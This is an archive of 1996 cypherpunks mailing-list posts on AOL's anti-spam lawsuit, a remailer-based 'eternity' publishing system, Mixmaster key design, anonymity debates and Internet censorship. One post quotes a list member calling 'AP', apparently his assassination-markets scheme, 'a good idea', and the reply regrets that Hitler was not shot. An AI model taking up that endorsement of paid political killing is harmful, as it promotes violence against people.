> >I don't know. I would presume so. I only guess that it was a 3-4-5
> >formation. But it does make some constants easy!

> Maybe we could each watch for these formations and keep a log of
> observations. I've done a little searching for more information but
> I find nothing easy. Perhaps one of my hard core skywatcher friends
> would know something as well.

I'll try to link with my old stargazers friends and ask questions around. If you get something new, write.

Cheers and good luck!

jfa

From declan at eff.org Sun Sep 8 19:59:49 1996
From: declan at eff.org (Declan McCullagh)
Date: Mon, 9 Sep 1996 10:59:49 +0800
Subject: Court challenge to AOL junk-mail blocks
In-Reply-To: <199609082348.TAA04495@yakko.cs.wmich.edu>
Message-ID:

No. A customer buys service from AOL and in doing so signs a contract with the company. AOL and the customer each has certain rights and obligations spelled out in the contract.

I confess I don't know if AOL's contract allows them to block spam. But in any case, spammers are not customers.

-Declan

CONTRACT - LEGAL DEFINITION

A contract, expressed or implied, is binding when six elements are present:

1. Parties involved have the capacity to enter into a contract, i.e. mental capacity and requisite age, or the authority to obligate the institution.
2. The contract must be based on an offer.
3. The offer must be accepted (acceptance by a written or oral promise - expressed acceptance, or by performance of the task in question implied acceptance).
4. The offer and acceptance must be mutual. The key here is proof of a "meeting of the minds" on terms and nature of the promise.
5. There must be performance in order for one or both parties to be bound by the mutually agreed terms of the contract. (An institution would not be obligated to pay until the contractor performed services agreed upon).
6. The contract must be for a legal purpose or it will not be binding.

On Sun, 8 Sep 1996, Damaged Justice wrote:

> >
> > The judge did mention "status quo" in his opinion. I would hope that
> > "status quo" would mean the ability of ISPs to offer and enforce whatever
> > contracts they want -- including banning incoming spam -- without the
> > intervention of the government. Unless, of course, the ISP breaks the
> > contract, but in that case the plaintiffs should be the customers, not
> > the spammer.
>
> Aren't spammers customers, by definition? If so, they have just as much
> right to bring suit as any other customer. Less moral justification, yes,
> but an equal standing in the law's eyes.
>
> --
> I let go of the law, and people become honest / I let go of economics, and
> people become prosperous / I let go of religion, and people become serene /
> I let go of all desire for the common good, and the good becomes common as
> grass. .oOo. [Tao Te Ching, Chapter 57, Stephen Mitchell translation]
>

// declan at eff.org // I do not represent the EFF // declan at well.com //

From aba at dcs.ex.ac.uk Sun Sep 8 20:22:49 1996
From: aba at dcs.ex.ac.uk (Adam Back)
Date: Mon, 9 Sep 1996 11:22:49 +0800
Subject: towards an eternity service
Message-ID: <199609082212.XAA00383@server.test.net>

[the relevance of this to remailer-operators, is that my example prototype architecture for discussion relies heavily on mixmaster remailers]

Ross Anderson's eternity service (postscript paper somewhere on http://www.cl.cam.ac.uk/~rja14/) is a distributed file system with the criteria that it should not be possible to delete information from it. The paper outlines ways that you might go about doing this, and gives as a design goal that it should not be possible even for concerted government attacks to remove information from the service.

Roughly the approach described is to have anonymous servers with secret shared data. The server doesn't know what it is serving, and the server charges per Mb/year of data storage.

This seems a pretty interesting idea, as it would be a great boon to free speech to be able to reliably publish information that would survive attempts to "unpublish" it, which seem to be gaining in popularity. Notable recent examples of such attacks being Scientologist attacks on distribution of its `scriptures', the German government's banning of nazi revisionist material, and the impending possibility of a repeat of the CDA at a (US) state level.

I think it is desirable to get something working now, even if it is far short of the design criteria Anderson describes. A working model would provide something on which to base discussion of improvements, and would also be an interesting experiment to see the sorts of uses such a system would be put to, and the political reaction to its uses.
The following doesn't depend on, but would be helped by having direct socket delivery of packets (for performance) in the mixmaster remailer-net and forward secrecy (for resilience to attack).

The idea comes in two parts, the first part, an anonymous www proxy using mixmaster to deliver packets, is present to provide cover traffic for real eternity system requests, the second part describes a way to achieve an eternity like system with the traffic mixed in with part 1 traffic, so that the two types of traffic can not be distinguished by attackers.

1. anonymous www proxies over mixmaster

The stated design goal for this part (it's partly a cover goal, though useful in its own right) is to ensure that users can access publicly accessible www pages without divulging their identity to the sites they are accessing, or even to an attacker who is monitoring net traffic. The user wants to hide which sites they are accessing, and what information they are accessing. No attempt is made to conceal the identity of the www sites accessed, a normal URL is used to access them.

This is basically just like www.anonymizer.com, except that traffic is routed over the mixmaster net. An http <-> mixmaster interface would be added to the existing mixmaster.

You add a blip in the line for outgoing traffic on your own machine which converts all outgoing http requests into mixmaster packets and feeds them into the remailer network. You choose random chains to get to the http servers.

The delivered packet at the exit remailer node is a new mixmaster packet type, a http request type, rather than a request to email to an individual, or post to a newsgroup, it results in an (where possible SSL encrypted) http request being made to the specified http server. Also included with the request is a mixmaster reply chain, so that the exit mixmaster node can route the return the requested www pages, and SSL session traffic back to the originator.
As you might imagine if this became popular, it could generate a lot of traffic. For a practical system I think it's inevitable that you'd need to provide some financial incentive for the mixmaster operators to subsidize their T3s :-) So you would need to incorporate per hop payments, for the remailers. This could be a relatively small payment, but is just there to ensure that they have the money to increase their bandwidth if the demand requires it.

I think that about explains part 1.

2. an eternity like system built on this system

There are a couple of extra requirements for the eternity system, firstly that the address of the www site must be concealed also, and secondly that the data is secret shared across multiple eternity www sites.

The first requirement can be met by the anonymous eternity www sites publicly posting to a newsgroup (via a mixmaster remailer of course:-) a mixmaster chain pointing at themselves.

To reduce the problem of the flood attack for finding the endpoint of a chain, firstly some of Peter Allan's suggestions on extra cover traffic, and on adding extra hops to increase cover traffic should help, but ultimately this only makes a longer concerted flood necessary to find the output. I don't see any easy solution to the flood attack, the only _real_ answer is a DC net. A slightly simpler, but less robust solution would be to find ways to have fixed levels of traffic between nodes in the remailer network. Surplus traffic at entry points could be rejected, so that the sender knows to try another remailer.

The other requirement for eternity is that the data should be secret shared. If all the eternity www servers publish their reply blocks, the user sends requests to a number of the eternity servers selected randomly. Choose the number so that it is likely that you will get the required k of n shares, given that there are n servers, and they all hold shares in the data, and that k of n shares are required to recover the secret.
You also need to ensure that the exit mixmaster which is acting as a http forwarder server can't tell whether it is making an eternity system request or an anonymous www proxy request. The fact that http traffic is blindly forwarded means that if the http request is SSL encrypted the http forwarding mixmaster remailer will not know the contents of the traffic, and so will not be able to distinguish traffic type: eternity or anonymous proxy.

As the eternity www servers don't know what the data in the shares they are holding is, they can't provide the indexing facility directly. Rather ordinary www pages, and other eternity www pages can be used to collect links to interesting eternity pages. In other words, it's decentralised, as is the www, and any indexing left up to the authors of eternity hosted www documents, or anyone else's indexing to interesting links.

A compromise technology which would greatly simplify access to the service would be public www proxies or gateways to the eternity service, so that no new software was required for the client. This would serve a similar role to WWW based remailers.

The scheme is complex in places but basically requires no new technology, at least for a crude implementation, without the finer points.

What can be missed out in a first pass implementation, and deferred for later incremental improvements:

  ecash postage to pay for remailer resources
  fixed traffic between remailers
  payment for www sites (anonymous www proxy and eternity service)
  oblivious transfer to setup shares

so that leaves the following to be done:

  blip in the line which routes http requests over mixmaster
  mixmaster reply chains for return http traffic
  secret sharing of data to send to eternity www servers
  periodic posting of mix reply blocks by eternity www servers
  public access www proxy, or www-cgi based gateway

comments, volunteers?

Adam
--
exported RSA today? --> http://www.dcs.ex.ac.uk/~aba/rsa/
#!/bin/perl -sp0777i

At 7:56 PM 9/8/96, Declan McCullagh wrote:
>I suppose it would be only polite to ask the Singapore government folks
>and IRS employees to join our conversation.
>
>The cypherpunks list now has nearly 1,400 direct subscribers, plus
>whoever reads it through local mail-news gateways.
>
>(Note I'm not indicating that a .gov.sg or .irs.gov address implies
>anything about an individual's personal political beliefs.)
>
>video at nhmxw0.fnal.gov
>e875836 at popcorn.llnl.gov
>foley_p at kosmos.wcc.govt.nz
..

What, so now my group, Government Office of Technology, is no longer considered part of the military-bureaucratic complex?

-- tcmay at got.net

(And to think I get paid a GS-16 salary just to keep tabs on you folks, feed you disinformation, and entice you into various operations.)

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."

From tcmay at got.net Sun Sep 8 20:53:05 1996
From: tcmay at got.net (Timothy C. May)
Date: Mon, 9 Sep 1996 11:53:05 +0800
Subject: Imminent Death of the Internet, GIF at 11
Message-ID:

At 5:40 PM 9/7/96, Martin Minow wrote:
>We certainly are seeing changes in the way we use the network. When
>I "got on the net" in the late 1970's, I was on two mailing lists
>(SF-Lovers and Human Net) and could read *all* of Usenet traffic
>in an hour or two. In the late 1980's, Usenet traffic totalled

The 2002 version, unless our list is outlawed as being part of a TICO (Terrorist-Influenced and Corrupt Organization) conspiracy:

"I could read *all* of the Cypherpunks traffic in a day or two..."

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."

From tcmay at got.net Sun Sep 8 20:55:18 1996
From: tcmay at got.net (Timothy C. May)
Date: Mon, 9 Sep 1996 11:55:18 +0800
Subject: [NOISE] Far-reaching tentacles . . . ?
Message-ID:

At 11:38 PM 9/8/96, Alan Bostick wrote:
>Found in the news:
>
>
> (SACRAMENTO)- The principals of six Sacramento area schools have
>received 46 used computers that were renovated by inmates at Folsom
>Prison. Warden Theo White delivered the machines after they were given a
>reprieve from the scrap heap. The prison obtained the donated personal
>computers from the non-profit Detwiler Foundation... which began working
                               ^^^^^^^^^^^^^^^^^^^
>five years ago to bring new technology into the state's classrooms.
>
>[Would you want *YOUR* CHILDREN to use computers that had been HACKED
>by CONVICTED CRIMINALS????]

Who cares about the convicted criminals? It's the connection to the Detwiler Foundation that would worry me.

(Now that's what you call an S. Boxx!)
--Medusa

From dlv at bwalk.dm.com Sun Sep 8 20:55:26 1996
From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 9 Sep 1996 11:55:26 +0800
Subject: Shit from Juno
In-Reply-To:
Message-ID: <6DRyTD58w165w@bwalk.dm.com>

Rabid Wombat writes:
>
> Complaints about spamming and cross-posting probably won't get you far,
> either. On-Net spamvertizing seems to be their source of revenue. Perhaps
> shaw.net needs to be contacted instead. It's either that, or give Floyd
> and Richard a nickel to go watch batman instead of playing with the computer.

FWIW, Juno is the project of D.E.Shaw, a very obnoxious investment bank here in NYC. It's ironic that the sysadmin at D.E.Shaw, Mark Moraes, is the moderator of some news.newbies? Usenet newsgroup.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps

From jamesd at echeque.com Sun Sep 8 22:43:14 1996
From: jamesd at echeque.com (James A. Donald)
Date: Mon, 9 Sep 1996 13:43:14 +0800
Subject: ASEAN nations generally pro-censorship
Message-ID: <199609090157.SAA13884@dns2.noc.best.net>

> _________________________________________________________________
> ASEAN FORUM AGREES ON NEED TO POLICE THE NET
> __________________________________________________________________________
>[...]
> But the statement suggested there was no agreement on a uniform
> approach to policing the Internet.

One could argue that the hundred years war was in substantial part the result of regulatory arbitrage against attempts to censor the printing press, that it was in large part an unsuccessful attempt to create a uniform standard of censorship by force of arms.

History suggests that there *won't* be a uniform approach on policing the net.

 ---------------------------------------------------------------------
                                        |
We have the right to defend ourselves   |   http://www.jim.com/jamesd/
and our property, because of the kind   |
of animals that we are. True law        |   James A. Donald
derives from this right, not from the   |
arbitrary power of the state.           |   jamesd at echeque.com

From tcmay at got.net Sun Sep 8 22:43:17 1996
From: tcmay at got.net (Timothy C. May)
Date: Mon, 9 Sep 1996 13:43:17 +0800
Subject: "Intended Purpose" of the Cypherpunks List
Message-ID:

At 3:09 PM 9/8/96, Wayne H. Allen wrote:
> Well maybe, political issues galore certainly, but very very little
>to do with cryptography. I mean what does TWA 800 have to do with this
>list. I mean let's be completely honest here, whatever the original
>purpose of the list was for it's been allowed to shift away from its
>intended purpose considerably.

I'm curious. You say the list has "been allowed to shift away from its intended purpose considerably."

First, who "allowed" it. (We should perhaps track down those who allowed this and rap them upside the head.)

Second, and more importantly, just what was its "intended purpose"?

While I delete immediately fantasies about how the Bilderbergers ordered TWA 800 shot down with Russian Strelas as a warning for Bill Clinton, the other discussions related to TWA 800, e.g., mandatory person-number I.D. to board planes, increased inspections, national data bases of "suspicious persons," etc., are very much on-topic for this list.

But, then, what would I know?

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."
From rodger at interramp.com Sun Sep 8 22:59:54 1996 From: rodger at interramp.com (Will rodger) Date: Mon, 9 Sep 1996 13:59:54 +0800 Subject: Court challenge to AOL junk-mail blocks Message-ID: <199609090152.VAA12651@interramp.com> -----BEGIN PGP SIGNED MESSAGE----- Declan, in reply to questions about Cyber Promo's statue re: AOL wisely wrote: >>No. A customer buys service from AOL and in doing so signs a contract >>with the company. AOL and the customer each has certain rights and >>obligations spelled out in the contract. >> >>I confess I don't know if AOL's contract allows them to block spam. But >>in any case, spammers are not customers. >> >>-Declan >> Cyber Promotions of course is not now a client of AOL, which is one the company's defenses against AOL. Although AOL attorneys don't make the connection outright, their filings seem to imply that once one is an AOL customer, he's always subject to their rules. Wallace, it seems, had an account or two with AOL and was spamming during that time in violation of terms of service. They soon bumped him from the service. Now that he's not a subscriber, they claim Wallace is still violating terms of service. How that's relevant to a former subscriber is far from clear. Wallace's attorneys, of course say it isn't relevant at all. No doubt about it; this one is going to be a lot of fun. Will Rodger Washington Bureau Chief Inter at ctive Week -----BEGIN PGP SIGNATURE----- Version: 2.9 iQEVAgUBMjN30UcByjT5n+LZAQEO0QgAhKgbD1ljZfDoZR/J9PF9wQFgZxoSM8DZ SfhfPMNDnBDqx1dq2qjxbxKC0uqP5AQq76ZPr+MVexvdI9ec+8W9DFW/O8ujOsJT yU/vg0XnWC3kNeQVW9OpTjlNZrlm37TRM5Fl/JeBxrFlws1aS1fG57Xnq2YYEJJ2 hrn20q9szJiRLnFJ0hSfjhsYkLir7qErhqMMOu0kw1HAqfA7kAzmoxD4ukaeqqL9 Hkqqf2E59xtOSvmMRtqgtGhUijiMeuO1K/wCITp0SS6U4XieeHrV5jpfY3RU6c2s g7OBHkMq6fjzWO29WJO67imOeb45bsZMM3vvqKlH5lxXHR+g1DjUnw== =Iatg -----END PGP SIGNATURE----- From jamesd at echeque.com Sun Sep 8 23:07:48 1996 From: jamesd at echeque.com (James A. 
Donald) Date: Mon, 9 Sep 1996 14:07:48 +0800 Subject: flimflamery on anonymity Message-ID: <199609090144.SAA12832@dns2.noc.best.net> james donald: > > Lucky Green and Dark Unicorn are not accountable. This is a problem? > > Because it is a problem "We" need to do something about it, (last line is sarcasm for the sarcasm impaired) At 11:39 AM 9/4/96 -0700, Vladimir Z. Nuri wrote: > scientists demand that each other be "accountable" for their > work, for example, and pseudonymous publication simply would > not be acceptable. So? Do you think cypherpunks are planning to go around with guns and force scientists to pay attention to pseudonymous scientific publications? > what about a business > that simply says, "we choose to require identity among our > customers, and you can go elsewhere if you disagree". the > extremist cypherpunks would be in a quandary over this example, > because they think they can support anarchocapitalist > freedom and anonymity at the same time. they will argue that > such a business will one day not exist. but shouldn't a business be > free to make this decision? rabid cpunks would probably > argue against such a decision. Cypherpunks would argue, do in fact argue, that such a business decision will be unwise in the long run for most businesses, but that all businesses, like anyone else, have the right to make stupid decisions. --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. 
| jamesd at echeque.com From Adamsc at io-online.com Sun Sep 8 23:29:49 1996 From: Adamsc at io-online.com (Adamsc) Date: Mon, 9 Sep 1996 14:29:49 +0800 Subject: talker (fwd) Message-ID: <19960909041342953.AAA192@IO-ONLINE.COM> On Sun, 8 Sep 1996 16:41:06 -0500 (CDT), Jim Choate wrote: >> Date: Sun, 8 Sep 1996 13:23:06 -0700 (PDT) >> From: "Z.B." >> Subject: Re: talker >> >> I just checked www.juno.com to see what kind of system they have, and it >> appears that it is a free email service. No charges at all. No wonder >> we get so many idiots from there - free mail and they probably don't >> bother to verify the people they give service to, either. > >Well we know at least one cpunk who is anti-anonymity.... Not necessarily. I think he's just saying that if it's free and anonymous you have no quality control. Even a token fee keeps out an amazing number of loons... - "'Anonymity is bad,' says a source who wishes to remain anonymous." - Nuff' said. * Home: Chris Adams | http://www.io-online.com/adamsc/adamsc.htp * Autoresponder: send email w/subject of "send resume" or "send PGPKEY" * Work: cadams at acucobol.com | V.M. (619)515-4894 | (619)689-6579 * Member in good standing of the GNU whirled hors d'oeuvre From loki at infonex.com Sun Sep 8 23:44:03 1996 From: loki at infonex.com (Lance Cottrell) Date: Mon, 9 Sep 1996 14:44:03 +0800 Subject: forward secrecy in mixmaster In-Reply-To: Message-ID: At 11:29 AM -0700 9/8/96, Adam Back wrote: >Lance Cottrell writes on several lists: >I suspected RSAs weird license might be the problem. (Given the >situation with PGP 2.x, I presume that the license does not permit you >to increase the max arithmetic precision.) Our options will open up alot when the patent expires next year. >> That is one of the reasons I have each remailer creat its own DH >> modulus, and allow it to change it periodically. 
> >Each remailer with it's own prime doesn't buy you a whole lot of >entropy because there aren't many mixmaster remailers, 4 bits >currently?. The entropy from having rekeying every day instead of say >every year, another 9 bits, 13 bits tops? I'm not sure what the >precise entropy increase is from going to 1024 to 4096, but it's got >to be many orders of magnitude better than 13 bits. > >I'd say junk RSAREF for the DH operations, use one of the other libs. >(You can do this for DH, without violating patents, right? But not >for RSA, so I guess if you care about the patent/license agreement >mess, you've got to use RSAREF for RSA signatures at least). Or maybe >you could just wait for PGP 3.0 which uses El Gamal, for sigs and pk >encryption, and presumably will have less restrictive key sizes. I agree it does not make much difference mathematically, but one DH modulus always makes me uneasy. DH is still patented though. I think I will continue to use RSAREF, but compose the standard so the protocol supports unlimited key sizes. >So as well as having bigger signing keys, for the sake of paranoia >(it's contagious), as you were saying, I guess you may gain some >security by not having a common modulus, and making the protocol allow >re-keying. > >If you used a different password for RSA and DH keys, and your machine >is compromised, you can sign a new DH key with RSA, and use El Gamal >signatures with the DH key normally. Hows that for paranoid :-) > >(Or another temporary RSA key, and RSA sigs, rather than El Gamal >sigs, whatever. You sign by proxy, that is the receiver mixmaster >gets a the temporary key signed by the long term RSA key, checks the >signature on the temporary key, and then checks the signature made by >the temporary key on the object in question). > >Greatly reduces the risk of having the password in the binary. 
You'd >need to manually type the RSA keys password to rekey, or if you were >real paranoid, you could keep the RSA key on your laptop, and copy the >new signed DH public key on to the remailer. Do this once a month, or >as often as you wish. > >This is a similar approach to that taken by people who have a huge >signing only PGP key, which they are careful to keep only on machines >they physically control, and have smaller keys which they use on >multi-user systems. For now I think we might just suggest that the operator keep a big PGP key to sign new key releases with. Key management is a whole nother thorny issue. I would love to see that whole part of Mixmaster reworked. Some deep thought should go into managing and distributing keys (it was almost an afterthought in my design). >> >a) include the DH key signed by the RSA key in the remailers public key >> > (may break backwards compatibility with existing versions of >> > mixmaster) >> > >> >b) send the DH public key at the start of each session >> > >> >c) send the DH public key on request >> >> I chose C. The in protocol I developed the sending remailer (A) sends a >> hash of the DH modulus to the receiving remailer (B). If B has it, they use >> it. If not, A sends it. I use the modulus from A because it has the stake >> in privacy. B will take messages from anyone, but A wants to know the >> messages it has goes to the correct other remailer B. > >sounds fine. > >Also, you might want to migrate to SHA1 in place of MD5, at some >point. Or to one of those megahashes like > > SHA1(MD5(x))||MD5(SHA1(x)) It is something to consider. Right now the software is not that flexible, but it should be in the next major revision. I too would like to move from total MD5 dependence. >Also mixmaster has capabilities like type 1 remailers right? If so >you would presumably add a capability indicating that the remailer >supports direct socket delivery. 
And another capability for forward >secrecy (the other thread "non-interactive forward secrecy" discusses >ways to retro-fit a less interactive forward secrecy mechanism into >email delivered mixmaster packets). Mixmaster recognizes type 1 messages, and passes them to a type 1 remailer. >The socket capability presumably would be useful to know that it is >likely to react more quickly. Forward secrecy is obviously nice to >know about for other reasons. > >Adam Socket support for type 1 is more complicated. The known RSA key is now the PGP key which encrypted the message. It is going to be a lot more complicated to go in a get all the info needed using PGP. Given a PGP library it could be done within Mixmaster, but it seems outside the scope of the program. My personal feeling is that as Mixmaster improves and gets more widely ported, type 1 should phase out. -Lance ---------------------------------------------------------- Lance Cottrell loki at obscura.com PGP 2.6 key available by finger or server. Mixmaster, the next generation remailer, is now available! http://www.obscura.com/~loki/Welcome.html or FTP to obscura.com "Love is a snowmobile racing across the tundra. Suddenly it flips over, pinning you underneath. At night the ice weasels come." --Nietzsche ---------------------------------------------------------- From jamesd at echeque.com Sun Sep 8 23:47:42 1996 From: jamesd at echeque.com (James A. Donald) Date: Mon, 9 Sep 1996 14:47:42 +0800 Subject: Voluntary Disclosure of True Names Message-ID: <199609090304.UAA20216@dns2.noc.best.net> At 10:49 AM 9/5/96 -0700, Vladimir Z. Nuri wrote: > I have seen it repeated here often that somehow anonymity is some kind > of a "right" that one should have in all kinds of different & important > transactions, not merely on "cyberspace debate societies". 
I see
> here frequently the implication that *private*entities* that want to
> enforce identity in their own transactions are somehow implementing
> a corrupt, orwellian system.

We hold that private entities have the right to attempt to impose
corrupt orwellian systems provided they do not do it at gunpoint, but we
doubt that they will succeed without guns.

> it sounded to me like that was all
> Dyson was advocating.

"Restrictions much stronger than a warrant" would imply that remailers
would have to keep logs under penalty of law.

---------------------------------------------------------------------
                                      |
We have the right to defend ourselves | http://www.jim.com/jamesd/
and our property, because of the kind |
of animals that we are. True law      | James A. Donald
derives from this right, not from the |
arbitrary power of the state.         | jamesd at echeque.com

From sunder at brainlink.com Sun Sep 8 23:48:52 1996
From: sunder at brainlink.com (Ray Arachelian)
Date: Mon, 9 Sep 1996 14:48:52 +0800
Subject: Cypherpunks subscribers - Singapore and NZ gvts, plus IRS
In-Reply-To: <199609082254.WAA04422@pipe3.t1.usa.pipeline.com>
Message-ID:

Actually I do have one user subscribing to my filtered list from the
irs. :)

=============================================================================
 + ^ + |  Ray Arachelian      |FL| KAOS KERAUNOS KYBERNETOS            |==/|\==
  \|/  |sunder at brainlink.com|UL|__Nothing_is_true,_all_is_permitted!_|=/\|/\=
<--+-->| ------------------   |CG|What part of 'Congress shall make no |=\/|\/=
  /|\  | Just Say "No" to     |KA|law abridging the freedom of speech' |==\|/==
 + v + | Janet Reno & GAK     |AK|      do you not understand?         |=======
===================http://www.brainlink.org/~sunder/=========================
 ActiveX! ActiveX! Format Hard drive? Just say yes!
From declan at eff.org Mon Sep 9 00:13:41 1996
From: declan at eff.org (Declan McCullagh)
Date: Mon, 9 Sep 1996 15:13:41 +0800
Subject: Court challenge to AOL junk-mail blocks
In-Reply-To: <199609090152.VAA12651@interramp.com>
Message-ID:

Thanks, Will, for the clarification. I agree that this will be a *very*
interesting case and a lot of fun to watch. :)

I should clarify one thing I said earlier in which I mentioned the
court's "opinion." That seems to imply something lengthy. In fact, it
was not. The order was a one-page TRO.

-Declan

On Sun, 8 Sep 1996, Will rodger wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
>
> Declan, in reply to questions about Cyber Promo's status re: AOL wisely wrote:
>
> >>No. A customer buys service from AOL and in doing so signs a contract
> >>with the company. AOL and the customer each has certain rights and
> >>obligations spelled out in the contract.
> >>
> >>I confess I don't know if AOL's contract allows them to block spam. But
> >>in any case, spammers are not customers.
> >>
> >>-Declan
> >>
>
> Cyber Promotions of course is not now a client of AOL, which is one of
> the company's defenses against AOL. Although AOL attorneys don't make
> the connection outright, their filings seem to imply that once one is
> an AOL customer, he's always subject to their rules. Wallace, it seems,
> had an account or two with AOL and was spamming during that time in
> violation of terms of service. They soon bumped him from the service.
>
> Now that he's not a subscriber, they claim Wallace is still violating
> terms of service. How that's relevant to a former subscriber is far
> from clear. Wallace's attorneys, of course say it isn't relevant at all.
>
> No doubt about it; this one is going to be a lot of fun.
>
> Will Rodger
> Washington Bureau Chief
> Inter at ctive Week
>

// declan at eff.org // I do not represent the EFF // declan at well.com //

From azur at netcom.com Mon Sep 9 00:45:36 1996
From: azur at netcom.com (Steve Schear)
Date: Mon, 9 Sep 1996 15:45:36 +0800
Subject: Browne and foreign tyrants
Message-ID:

> jim bell wrote:
>
>And this was a real shame. Over 30 million people died in WWII, directly or
>indirectly. We knew that Hitler was going to be a problem well before 1936.
> Think how many could have been saved...
>
>If anything, WWII is excellent proof that AP is a good idea. Stauffenberg
>was the German who bombed Hitler's meeting in 1944 but failed to kill him.
>Stauffenberg knew as early as 1942 that Hitler needed to be killed, and a
>recent "60 Minutes" episode related how hundreds of people knew about this
>plot.

In the late 30's Bugsy Siegel was in Europe visiting a friend (a
countess, I believe). At one of her parties Hitler and a few henchmen
also showed up. When Bugsy found out who they were he went to get his
gun and finish them off. It was only on the pleading of his friend, that
it would set off an international incident and could ruin her, that
Bugsy relented. Too bad he wasn't more of a hot head.

PGP Fingerprint: FE 90 1A 95 9D EA 8D 61 81 2E CC A9 A4 4A FB A9
---------------------------------------------------------------------
Snoop Daty Data     | Internet: azur at netcom.com
Grinder             | Voice: 1-702-655-2877
Sacred Cow Meat Co. | Fax: 1-702-658-2673
7075 W.
Gowan Road, #2148 |
Las Vegas, NV 89129 |
---------------------------------------------------------------------

Just say NO to prescription DRUGS.

From sophi at best.com Mon Sep 9 00:49:12 1996
From: sophi at best.com (Greg Kucharo)
Date: Mon, 9 Sep 1996 15:49:12 +0800
Subject: Conservation Laws, Money, Engines, and Ontology
Message-ID: <199609090401.VAA26172@dns2.noc.best.net>

One thing that occurs here. I imagine a scenario where you have a
"share" of resources on a system (an ISP for example). You're metered as
to how much you can post or store. Actually as it is now posting is
regulated through extra payments per meg above the limit. Spam is being
somewhat regulated by Terms of Service type things, but my point is what
is to prevent pooling resources among several systems to achieve the
same Spam pursuits some have. Say for example that an individual gets
several accounts to balance the load at their point. The Usenet for
example has no "choke point". How could ISP's apply conservation here?
If you limit the amount of traffic you still aren't holding back the
flow of "spam". Here's where reputations could come in. You couldn't
open a new account anywhere without a good "reputation". This could aid
in balancing the load of certain people.

Greg Kucharo
sophi at best.com
"Eppur si moeve" -Galileo

From moroni at scranton.com Mon Sep 9 00:52:03 1996
From: moroni at scranton.com (Moroni)
Date: Mon, 9 Sep 1996 15:52:03 +0800
Subject: [NOISE] Far-reaching tentacles . . . ?
In-Reply-To:
Message-ID:

Who cares! Computers are computers. I wish someone would send me one,
reconditioned or not. I am back on a dumb terminal because my 8088's hd
gave up the ghost and decided to leave it at the shop while I upgrade.

On Sun, 8 Sep 1996, Timothy C.
May wrote:

> At 11:38 PM 9/8/96, Alan Bostick wrote:
> >Found in the news:
> >
> >
> > (SACRAMENTO)- The principals of six Sacramento area schools have
> >received 46 used computers that were renovated by inmates at Folsom
> >Prison. Warden Theo White delivered the machines after they were given a
> >reprieve from the scrap heap. The prison obtained the donated personal
> >computers from the non-profit Detwiler Foundation... which began working
>                                ^^^^^^^^^^^^^^^^^^^
> >five years ago to bring new technology into the state's classrooms.
> >
> >[Would you want *YOUR* CHILDREN to use computers that had been HACKED
> >by CONVICTED CRIMINALS????]
>
> Who cares about the convicted criminals? It's the connection to the
> Detwiler Foundation that would worry me.
>
> (Now that's what you call an S. Boxx!)
>
> --Medusa
>
>
>

From banisar at epic.org Mon Sep 9 01:01:16 1996
From: banisar at epic.org (Dave Banisar)
Date: Mon, 9 Sep 1996 16:01:16 +0800
Subject: AST Final Agenda
Message-ID:

Hello,

I hope you will be able to join us for our conference in Ottawa next
week. Here is the final agenda.

Dave

PROGRAM

ADVANCED SURVEILLANCE TECHNOLOGIES CONFERENCE II

Sponsored by
Privacy International
Electronic Privacy Information Center

September 16, 1996
Citadel Ottawa Hotel and Convention Centre
Ottawa, Canada

9:00 am   COFFEE AND REGISTRATION

9:30 am   WELCOME AND INTRODUCTION: NURTURING THE SURVEILLANCE SOCIETY

Advanced surveillance functions have become an integral part of
widescale information systems used by governments and businesses.
Monitoring of the activities of individuals is seen as a desirable - and
often technically essential - component in many of these systems. Once
regarded as purpose-built stand alone innovations, the modern
surveillance device for identification, profiling or tracking has been
re-invented as a tool for commercial leverage.
In these introductory remarks, Simon Davies and Dave Banisar explore the
key technical, political, cultural and legal changes that are nurturing
the growth of surveillance technologies across the world.

  o Simon Davies, London School of Economics & Director General, Privacy
    International
  o Dave Banisar, Electronic Privacy Information Center & editor,
    International Privacy Bulletin

10:15 am  FEATURED SPEAKER: SURVEILLANCE TECHNOLOGIES OF THE INTELLIGENCE
          AGENCIES

What kinds of technologies are the intelligence agencies of the world
using? Who are they using it against? Are they legally accountable for
their actions? Mike Frost, a former spy for the Canadian Security
Establishment will talk about his experiences using these technologies
to spy on Canadian citizens and the relationship of the CSE to the US
National Security Agency.

  o Mike Frost, Former Intelligence Officer, Canadian Communications
    Security Establishment & author, Spyworld

11:00 am  BREAK

11:15 am  SURVEILLANCE AND THE INTERNET

SIGINT ONLINE: GOVERNMENT SIGNALS INTELLIGENCE ON THE NET

  o Wayne Madsen, Author, Handbook of Personal Data Protection

From Fort Meade, Maryland to Cheltenham, England and from Canberra,
Australia to Issy les Moulineaux in Paris, signals intelligence (SIGINT)
specialists are honing their skills at monitoring digital information.
SIGINT agencies everywhere are increasingly throwing their surveillance
web over the Internet and other data networks of interest. This session
shall examine the methods by which SIGINT agencies conduct such on-line
intelligence-gathering activities, including manipulation of encryption
systems to exploiting weaknesses in communications architectures,
including the use of anonymous remailers, rigging encryption systems,
